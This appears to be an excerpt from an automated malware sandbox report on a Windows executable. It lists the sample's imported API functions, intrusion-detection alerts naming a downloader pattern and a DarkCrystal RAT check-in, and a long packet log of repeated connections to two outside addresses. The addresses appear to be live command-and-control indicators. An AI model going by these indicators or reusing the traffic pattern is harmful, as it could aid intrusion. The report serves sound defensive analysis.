KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T19:22:28.144078+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49737 | 34.117.59.81 | 443 | TCP
2024-10-27T19:22:43.305353+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49739 | 188.114.97.3 | 80 | TCP
2024-10-27T19:22:51.390049+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49752 | 34.117.59.81 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Oct 27, 2024 19:22:45.352305889 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.360219955 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.360254049 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.549926996 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.597021103 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.664743900 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.696404934 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.852617979 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.904166937 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.904325962 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.904481888 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.008512020 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.348201036 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.348388910 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.349253893 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.354486942 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.354557037 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.354811907 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.354929924 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.355014086 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.355076075 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.355181932 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.360619068 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.712167025 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.717921019 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.953052998 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.069375038 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.264524937 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.367862940 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.451494932 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.451936007 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.457434893 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.457474947 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.457561016 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.457575083 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.457740068 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.463293076 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.805830002 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.811896086 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.058985949 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.195992947 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.371516943 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.508500099 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.657361031 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.657789946 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.663261890 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.663331032 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.663367033 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.663445950 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.663537979 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.669845104 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.008608103 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.015603065 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.264313936 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.367898941 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.582602978 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.664779902 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.759526968 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.759890079 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:49.759948969 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.760940075 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:49.764314890 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:49.764337063 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.765290976 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.769464016 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.774657011 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.780139923 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.780261040 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.780354023 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.785792112 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.803361893 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.808902979 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.811388969 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.811465979 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.819879055 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.150188923 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.155854940 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.155894995 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.155922890 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.155925035 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.155976057 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156061888 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156090975 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156119108 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156121969 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156147003 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156166077 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156193018 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156199932 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156228065 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156254053 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156286001 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156318903 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161490917 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161545038 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161550045 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161676884 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161714077 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161750078 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161788940 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161828995 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161930084 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161957979 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161998987 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.190643072 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.196115017 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.202502966 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.202621937 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.254647970 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.254772902 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.264822960 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.265019894 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.270878077 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.270909071 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.270967960 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.270994902 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271028042 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271055937 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271106005 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271138906 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271171093 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271271944 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271433115 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271460056 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271511078 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271538019 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271564007 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271590948 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271616936 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271663904 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271691084 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271718025 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271744013 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271770954 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271797895 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271830082 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.383308887 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.398643970 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.398746014 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.400852919 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.400866032 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.401196003 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.426687956 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.461283922 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.507340908 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.508543015 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.531064987 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.607523918 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.608937025 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.609016895 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.611015081 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.633193970 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.633223057 CET4434975234.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.633339882 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:57.470586061 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.507241011 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.555372953 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:57.713009119 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:57.867896080 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.031605959 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.164758921 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.176062107 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.176415920 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.182279110 CET8049763188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.182339907 CET4976380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.182758093 CET8049764188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.182832003 CET4976480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.209662914 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.215291023 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.215389967 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.217063904 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.222522974 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.571202993 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:58.576658964 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.819880962 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:58.867901087 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.142858028 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.195996046 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.284347057 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.285360098 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.291404009 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.291480064 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.291584969 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.292953014 CET8049765188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.293011904 CET4976580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.297020912 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.649451017 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:59.654891014 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.895333052 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:59.945997000 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.194859028 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.242866039 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.323828936 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.324173927 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.330413103 CET8049768188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.330459118 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.330528021 CET4976880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.330564976 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.330681086 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.336049080 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.680715084 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:00.686153889 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:00.956592083 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.055392027 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.144697905 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.301338911 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.301758051 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.439527035 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.439599991 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.440059900 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.440123081 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.441716909 CET8049769188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.441793919 CET4976980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.443068981 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.449450016 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:01.790693045 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:01.797358036 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.026992083 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.164750099 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.222079039 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.367876053 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.560245991 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.560842037 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.566191912 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.566246986 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.566646099 CET8049770188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.566693068 CET4977080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.570138931 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.575443029 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.625802994 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.631171942 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.631241083 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.633383989 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.638777971 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.914840937 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.920305967 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.920424938 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:02.977435112 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:02.982855082 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.172195911 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.228634119 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.278883934 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.278899908 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.473891973 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.474694967 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.480443001 CET8049782188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.480503082 CET4978280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.606415987 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.606887102 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.612196922 CET8049781188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.612263918 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.612346888 CET4978180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.612375021 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.612495899 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.617866993 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:03.961806059 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:03.967308998 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.221579075 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.274113894 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.408225060 CET8049788188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.461625099 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.517185926 CET4978880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.521003962 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.526371002 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:04.526839018 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.526927948 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:04.532577038 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.031265974 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.037425995 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.130562067 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.180370092 CET4979480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:05.459125042 CET8049794188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:05.508483887 CET4979480192.168.2.4188.114.97.3
